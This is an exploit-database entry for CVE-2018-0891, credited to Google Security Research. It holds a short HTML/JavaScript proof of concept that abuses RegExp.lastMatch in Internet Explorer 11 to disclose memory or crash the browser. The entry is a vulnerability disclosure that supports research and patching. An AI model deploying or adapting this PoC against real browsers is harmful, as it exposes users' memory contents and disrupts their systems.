Internet Explorer - 'RegExp.lastMatch' Memory Disclosure



EKU-ID: 48259 CVE: CVE-2018-0891 OSVDB-ID:
Author: Google Security Research Published: 2018-03-20 Verified: Verified
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/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

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*/

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

/*
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Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/